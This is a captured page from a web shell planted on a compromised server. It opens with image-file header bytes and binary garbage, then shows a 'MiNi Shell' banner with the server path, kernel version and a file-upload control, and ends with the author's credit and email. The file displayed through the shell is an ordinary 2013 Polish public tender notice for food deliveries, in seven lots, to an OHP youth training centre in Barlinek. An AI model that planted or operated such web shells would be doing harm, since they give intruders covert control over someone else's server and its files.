JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130729/300298-N-2013.html

<p class="kh_header"><b>Szczecin: Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1.</b><br>
<b>Numer ogłoszenia: 300298 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Zachodniopomorska Wojewódzka Komenda w Szczecinie , ul. Dworcowa 19, 70-206 Szczecin, woj. zachodniopomorskie, tel. 091 8126946, faks 091 8127981 w. 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zachodniopomorska.ohp.pl, www.zachodniopomorska-bip.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ochotnicze Hufce Pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.30.00.00-1, 15.10.00.00-9, 03.14.25.00-3, 15.20.00.00-0, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta cenowa
2. Pełnomocnictwo-jeżeli dotyczy
3. Kalkulacja ceny</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zachodniopomorska.ohp.pl, www.zachodniopomorska-bip.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy ul. Dworcowa 19, 70-206 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 11:00, miejsce: Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy ul. Dworcowa 19, 70-206 Szczecin-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Akcja 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	jogurt naturalny  g 100.	szt.	10
2	jogurt owocowy   g 100	szt	180
3	Masło 82% tłuszczu 200g	szt.	100
4	mleko niepasteryzowane  2% 1 l w kartonie	szt.	65
5	ser topiony - zegary  200g	szt.	20
6	ser twarogowy - półtłusty	kg	18
7	ser żółty - twardy	kg	36
8	serek homogenizowany smakowy 125g	szt.	30
9	śmietana 18% 400g	szt.	30
10	Ser topiony Plastry min. 150 g.	szt.	20
11	Jogurt czek. 125 g 	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	baton czekoladowy - 50g	szt.	30
2	cukier kryształ - 1 kg	kg	30
3	cukier puder  500 g	kg	3
4	jaja   53-63g	szt.	280
5	kakao 100 g	szt.	4
6	kasza jęczmienna - 500g	szt.	4
8	kawa sypana 225 g	szt.	2
9	ketchup 500 g	szt.	15
10	kwasek cytrynowy - 50g	szt.	15
11	liść laurowy-30g	szt.	3
12	majonez - 400g	szt.	10
13	makaron 400 g świderki	szt.	5
14	makaron spaghetti-400g	szt.	5
15	mąka typ 500 - 1kg	szt.	25
16	miód naturalny 500g	szt.	6
17	musztarda - 250g	szt.	12
18	ryż biały 1 kg	szt.	9
19	ocet spirytusowy - 0,5l	szt.	5
20	olej 1l	szt.	25
21	pieprz czarny mielony - 50g	szt.	12
22	przyprawa do mięs 250 g	szt.	6
23	przyprawa do zup w płynie 0,5 l  typu Maggi	szt.	5
24	skrobia ziemniaczana - 1kg	szt.	4
25	 sól - 1 kg	szt.	8
26	zupa rosół  typu amino 60g	szt.	25
27	przyprawa do zup typu warzywko 200g	szt.	9
28	papryka mielona  20 g	szt.	10
29	cukier waniliowy 20g	szt.	5
30	cynamon 15 g.	szt.	2
31	krem czekoladowy typu Nutella 230g	szt.	10
32	płatki kukurydziane zw. 250g. 	szt.	24
33	płatki kukurydziane czekol.250g. Typu nesquik	szt.	24
34	czekolada mleczna 100 g	szt.	30
35	makaron nitka rosołowa  0.500g	szt.	5
36	herbata  owocowa  (op 25 szt) typu Lipton	szt.	18
37	ciastka mix  1 kg. Kruche	op.	6
38	woda 0,5 l niegazowana	szt.	60
39	woda 1,5 l gazowana	szt.	90
40	napój owocowy (różne smaki) w kartonie 2l typu Caprio	szt.	40
41	woda niegazowana 1.5 l	szt.	90
42	bazylia  10g	szt.	2
43	oregano 10g	szt.	2
44	majeranek	szt.	10
45	bułka tarta 0,5 kg	szt.	12
46	drożdże piekarnicze 100g	szt.	5
47	ciasteczka maślane	kg	2
48	cukierki krówki	kg	3
49	krakersy	kg	1
50	pierniczki z nadzieniem w czekoladzie	kg	5
51	herbata czarna ekspresowa 100szt	op.	6
52	kawa typu Nescaffe - rozpuszczalna	kg	1,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	arbuzy	kg	20
2	banany	kg	18
3	buraki	kg	8
4	cebula	kg	20
5	cytryny	kg	5
6	fasolka szparagowa	kg	10
7	kalafior	szt.	12
8	kapusta biała-młoda	szt.	15
9	kapusta kwaszona 5kg	op.	1
10	kapusta pekińska-luz	szt.	5
11	gruszka	kg.	6
12	śliwka 	kg	6
13	marchew	kg	20
14	ogórki gruntowe	kg	35
15	ogórki kiszone  3 kg	szt.	2
16	papryka świeża-czerwona	kg	5
17	pieczarki	kg	6
18	pietruszka korzeń	kg	8
19	pietruszka natka - pęczek	pęcz	15
20	pomidory	kg	40
21	por	szt.	15
22	rzodkiewka	pęczek	15
23	sałata lodowa	szt.	25
24	sałata masłowa	szt.	10
25	seler korzeń	kg	10
26	winogrona czerwony	kg	5
27	winogrona zielony	kg	5
28	ziemniaki	kg	135
29	Szczypior	pęczki	20
30	Brokuły	szt.	15
31	Koper	pęczek	15
32	Jabłko 	kg.	30
33	Brzoskwinie 	kg.	10
34	Nektarynki 	kg.	10
35	Kiwi	szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	bułka zw. -  min. 80g	szt.	120
2	bułki słodkie 100g	szt.	180
3	chleb razowy 0,6kg	szt.	15
4	chleb zw. 0,6 kg	szt.	120
5	pączki z nadzieniem	szt.	60
8	Bułka zwykła 50g	szt.	320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	dżemy różne smaki-   320 g.	szt.	35
2	fasola sucha- luz jaś	kg	2
3	groszek konserw.-400g	szt.	5
4	kukurydza konserw. 400 g	szt.	8
5	ogórki konserw. -900 g	szt.	8
6	czosnek granulowany 20 g	szt.	10
7	koncentrat pomidorowy 200g.	szt.	15
8	fasola kons. Szparag. 500g.	szt.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	filet z miruny b/s	kg	7
2	makrela wędzona	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa artykułów spożywczych do Ośrodka Szkolenia i Wychowania OHP ul. Św. Bonifacego 36, 74-320 Barlinek - jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Aktywnie cieszyć się sportem w ramach Akcji 1.1 - Wymiany młodzieżowe programu Młodzież w Działaniu, nr umowy PL-11-124-2013-R1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	baton drobiony szynkowy	kg	2
2	filet z kurczaka surowy - płaty	kg	6
3	kiełbasa typu krakowska drob.	kg	2
4	kiełbasa  typu zwyczajna	kg	10
5	Kiełbasa szynkowa wieprzowa	kg	3
6	kiełbasa typu  śląska	kg	7
7	kiełbasa typu krakowska parzona	kg	3
8	kości  wieprzowe	kg	15
9	kiełbasa żywiecka	kg	3
10	ogonówka wieprzowa	kg	4
11	parówki drobiowe	kg	3
12	parówki śląskie wieprzowe	kg	3
13	pasztet pieczony wieprzowy	kg	2
14	pasztetowa wieprzowa	kg	1,5
15	polędwica drobiowa	kg	2
16	polędwica z indyka	kg	2
17	porcje rosołowe	kg	8
18	schab wieprzowy b/k	kg	5
19	słonina świeża	kg	2
20	udka z kurczaka surowe	kg	10
21	Łopatka b/k	kg	14
22	kiełbasa jałowcowa	kg	2
23	kiełbasa wieprzowa	kg	2
24	kiełbasa piwna	kg	2
25	szynka pomorska	kg	2
26	szynka tyrolska	kg	2
27	szynka drobiowa	kg	3
28	szynka z indyka	kg	3
29	smaczek w konserwie	kg	2
30	łopatka z przyprawami	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com